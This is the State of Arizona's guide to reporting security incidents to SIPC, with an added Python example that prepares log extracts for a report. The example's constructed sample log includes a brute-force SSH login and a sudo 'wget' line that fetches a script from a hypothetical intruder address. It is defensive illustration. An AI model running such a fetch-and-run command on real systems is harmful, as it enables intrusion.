State of Arizona Security and Privacy Incident Reporting

Incident Definition:
An incident is an act that violates an explicit or implied security or privacy policy. The definition includes, but is not limited to, the following types of activity, which are widely recognized as policy violations:
- Attempts (either failed or successful) to gain unauthorized access to a system or its data/information
- Unwanted disruption or denial of service
- The unauthorized use of a system for the processing or storage of data
- Changes to system hardware, firmware, or software characteristics without the owner’s knowledge, instruction or consent
- Unauthorized access, alteration, disclosure, loss, theft or acquisition of non-electronic confidential information
- Confidential information may be defined by agency policy or by Arizona law
Report any activities that
meet these criteria for being an incident. When reporting activity that
may be the work of multiple intruders, we request that you report each
incident separately.
Description of the Activity:
Reporting incidents to SIPC helps to promote greater security awareness and improves the security of services provided over the Internet. A report lets SIPC collect information about the activity and, where the evidence supports it, correlate other incidents with this intrusion.
One of the most important parts of the incident report is a description
of the intruder’s activity. Mention any vulnerabilities which may have
been exploited, modifications that were made to the system, or software
that was installed. You may include references to advisories or other
documents which describe the activity in more detail.
Log Extracts Showing the Activity:
Whenever possible, include log entries showing the activity with the report, particularly when the logs provide significant detail. Remove log entries that are not related to the intruder activity to help avoid confusion. If the intruder’s activity generated a large number of very similar entries, it is usually sufficient to extract a sample portion of the log; indicate in your message that you have done so, and give a quick estimate of the total number of log entries. A description of the log format is helpful, and very important for log entries that do not include descriptive text or that are generated by tools that are not widely distributed. When sending log entries, ensure that you do not violate any non-disclosure policies that your agency has in place. If the logs do not show the intruder’s activity (perhaps because the intruder deleted them), state this clearly in the report to help minimize requests for this information.
Time Zone and the Accuracy of your Clock:
Clearly identify the time zone
for your comments and logs. A time zone relative to GMT (or UTC) is
preferred, since less formal time zone designations can be
misinterpreted. If the times recorded in the log entries are known to be
inaccurate by more than a minute or two, include a statement of this
inaccuracy. If the system was synchronized with a national time server,
mention this fact as well.
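The two sections above describe how to prepare log extracts (keep only entries tied to the intruder, sample repetitive entries, state the total count and the log format) and how to state the time zone and clock accuracy. The script below is an added example of doing that mechanically; it is not from the State of Arizona page and is not SIPC tooling. The log lines are constructed, the intruder address 203.0.113.9 is a hypothetical indicator from a documentation address range, and the host's local time zone (MST, UTC-7) and the clock note are assumptions.

```python
"""Prepare a log extract for an incident report (added example, not SIPC's tooling).

Given raw syslog-style lines, keep only entries tied to one intruder indicator,
collapse near-identical entries into a short sample, count the total, and
rewrite timestamps in UTC so the report states an unambiguous time zone.
"""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Assumption: the host logs in local time, MST (UTC-7, no daylight saving).
LOCAL_TZ = timezone(timedelta(hours=-7), name="MST")
LOCAL_TZ_NAME = "MST (UTC-7)"

# Hypothetical indicator: the suspected intruder's source address (TEST-NET-3 range).
INDICATOR = "203.0.113.9"

# Constructed sample log, not real data. The cron line and the final ops login
# are unrelated noise that should be removed from the extract.
SAMPLE_LOG = """\
2023-03-01 02:14:03 host1 sshd[2211]: Failed password for root from 203.0.113.9 port 51022 ssh2
2023-03-01 02:14:05 host1 sshd[2213]: Failed password for root from 203.0.113.9 port 51024 ssh2
2023-03-01 02:14:07 host1 sshd[2215]: Failed password for admin from 203.0.113.9 port 51026 ssh2
2023-03-01 02:14:09 host1 cron[900]: (root) CMD (run-parts /etc/cron.hourly)
2023-03-01 02:14:11 host1 sshd[2217]: Failed password for admin from 203.0.113.9 port 51028 ssh2
2023-03-01 02:15:40 host1 sshd[2230]: Accepted password for admin from 203.0.113.9 port 51100 ssh2
2023-03-01 02:16:02 host1 sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.9/x.sh
2023-03-01 02:20:00 host1 sshd[2250]: Accepted publickey for ops from 198.51.100.4 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^:\[ ]+)(?:\[\d+\])?: (?P<msg>.*)$"
)


def parse_line(line, local_tz=LOCAL_TZ):
    """Parse one line; return None if it does not match the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    local = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=local_tz)
    return {"ts": local.astimezone(timezone.utc), "host": m["host"],
            "prog": m["prog"], "msg": m["msg"]}


def signature(msg):
    """Replace digit runs so entries differing only in port/PID share one key."""
    return re.sub(r"\d+", "N", msg)


def build_extract(log_text, indicator, local_tz=LOCAL_TZ, max_per_signature=2):
    """Filter to the indicator, sample repetitive entries, and count everything."""
    counts = Counter()
    sample = []
    total = unrelated = unparsed = 0
    for raw in log_text.splitlines():
        rec = parse_line(raw, local_tz)
        if rec is None:
            unparsed += 1          # still counted so the report can mention it
            continue
        if indicator not in rec["msg"]:
            unrelated += 1         # unrelated entries are dropped to avoid confusion
            continue
        total += 1
        sig = signature(rec["msg"])
        counts[sig] += 1
        if counts[sig] <= max_per_signature:   # keep only a few of each repeated type
            sample.append(f"{rec['ts']:%Y-%m-%dT%H:%M:%SZ} {rec['host']} {rec['prog']}: {rec['msg']}")
    return {"total_matching": total, "unrelated_removed": unrelated,
            "unparsed": unparsed, "signature_counts": counts, "sample": sample}


def format_report(extract, indicator, local_tz_name=LOCAL_TZ_NAME,
                  clock_note="host synchronised to an NTP server; believed accurate to within seconds"):
    """Render the header a report needs: log format, time zone, clock accuracy, counts."""
    header = [
        f"Log extract for indicator {indicator}",
        "Format: syslog-style '<date> <time> <host> <program>[pid]: <message>'; "
        f"original timestamps in {local_tz_name}, shown below converted to UTC (ISO 8601, 'Z').",
        f"Clock: {clock_note}",
        f"Matching entries: {extract['total_matching']} total; {len(extract['sample'])} shown as a "
        f"sample (further repeats of the same message type omitted); "
        f"{extract['unrelated_removed']} unrelated entries removed; {extract['unparsed']} lines not parsed.",
        "",
    ]
    return "\n".join(header + extract["sample"])


if __name__ == "__main__":
    print(format_report(build_extract(SAMPLE_LOG, INDICATOR), INDICATOR))
```

The signature step is deliberately crude (every digit run becomes N) so that entries differing only in port or PID collapse together; check the sample by eye before sending, since it will also merge distinct source addresses that share a message text.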
Reporting Issues and Alternatives:
Electronic mail provides an accurate and efficient medium for exchanging information that is too complex to discuss over the telephone, such as dumps or large log files. E-mail also provides a reliable record of communications that can be referred to when responding to the incident.
If you are disconnected from the Internet to recover from a compromise,
or if you are unable to send mail due to a denial of service attack,
contact SIPC on the telephone hot line. Occasionally, a compromised
system’s electronic mail will be monitored by the intruder. If you are
unable to obtain Internet mail access from the system, and do not want
to alert the intruder by using e-mail on the compromised system, contact
SIPC on the telephone.
When electronic mail is not available or provides inadequate security,
and you have logs or other information that is not easily conveyed on
the telephone, send the information via FAX.